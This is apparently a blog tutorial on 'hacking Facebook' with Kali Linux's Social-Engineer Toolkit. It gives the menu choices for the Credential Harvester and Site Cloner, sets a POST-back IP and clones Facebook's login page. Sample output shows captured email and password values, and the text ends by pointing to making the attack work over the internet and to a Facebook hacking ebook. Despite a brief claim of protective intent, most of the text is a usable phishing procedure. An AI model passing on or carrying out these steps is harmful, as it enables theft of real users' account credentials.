Here we will discuss how to hack Facebook with kali linux, as well as, to develop understanding of how fake web pages are created, so that you can protect yourself from such attacks.
Hacking Facebook with Kali Linux
The Social-Engineer Toolkit (SET) was created and written by the founder of TrustedSec. It is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon. With over two million downloads, SET is the standard for social-engineering penetration tests and supported heavily within the security community.
So, lets begin …
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update…
[*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
[—] The Social-Engineer Toolkit (SET) [—]
[—] Created by: David Kennedy (ReL1K) [—]
[—] Version: 4.3.9 [—]
[—] Codename: ‘Turbulence’ [—]
[—] Follow us on Twitter: @trustedsec [—]
[—] Follow me on Twitter: @dave_rel1k [—]
[—] Homepage: https://www.trustedsec.com [—]
Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
- 1 [enter]
- 2 [enter]
- 3 [enter]
- 1 selects social engineering attacks. Obvious choice if you read the other options from 1 to 9 (and 99 for exit)
- The 2 selects Website Attack Vectors. Not that obvious. The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
- Then, the 3 selects Credential Harvestor. The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.
applications that it can utilize within the attack.The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely same web application you were attempting to clone.
The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality.
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
Type 2 to select site cloner.
Find your IP
Back to se-toolkit
Now it’ll ask you to specify the IP to which the data is supposed to be sent to. That’ll be your IP address. Since this is your internal IP address (i.e. local IP), the fake facebook page will work only for computers connected with your LAN.
Now it’ll ask for the page to be cloned. Enter https://www.facebook.com/.
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/
Now in your browser on Kali Linux, enter your IP. It will display facebook login page. Enter any info and press login. You will get the information in se-toolkit. If you are using VMWare or virtualbox, then you can try and enter the IP on the browsers there. It will work.
On the Kali Linux Machine itself
Entering the IP in browser shows you the fake login page. Also, se-toolkit registers the visit and says 192.168.154.133 – – [25/March/2016 02:32:32] “GET / HTTP/1.1” 200 –
POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password
On Windows 8 machine (host)
POSSIBLE USERNAME FIELD FOUND: email=windows8host
POSSIBLE PASSWORD FIELD FOUND: pass=password2
Make it work over internet
Hacking Facebook Ebook
You can find tons of methods/tricks about facebook in here.
Download here (Credit to the Author for the share)